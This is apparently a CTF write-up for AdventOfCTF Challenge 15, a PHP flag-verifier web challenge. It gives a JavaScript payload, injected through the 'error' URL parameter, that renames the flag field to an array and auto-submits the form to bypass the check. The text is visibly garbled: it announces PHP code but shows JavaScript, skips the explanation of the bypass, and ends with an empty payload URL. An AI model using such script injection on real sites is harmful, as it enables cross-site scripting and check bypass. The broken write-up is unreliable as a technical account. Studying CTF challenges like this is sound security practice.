+++ author = "Maik de Kruif" title = "Challenge 15" subtitle = "Challenge 15 - AdventOfCTF" date = 2020-12-31T22:34:24+01:00 description = "A writeup for challenge 15 of AdventOfCTF." cover = "img/writeups/adventofctf/2020/9c6afd807a15973b962cf3aee3dbe836.png" tags = [ "AdventOfCTF", "challenge", "ctf", "hacking", "writeup", "web", "php", ] categories = [ "ctf", "writeups", "hacking", ] +++ - Points: 1500 ## Description We have now created a flag verifier service. Enter a flag to see if it matches the challenge you are trying to solve. Visit to start the challenge. ## Recon Upon opening the challenge website we're greeted with some PHP code: ```php setTimeout(() => { let flagInput = document.getElementById("flag"); flagInput.name = "flag[]"; flagInput.value = "hi"; flagInput.form.submit(); }, 1000); ``` If we then put this in the `error` parameter in the URL, it will solve the challenge automatically. The resulting URL is the following: `https://15.adventofctf.com/index.php?error=`.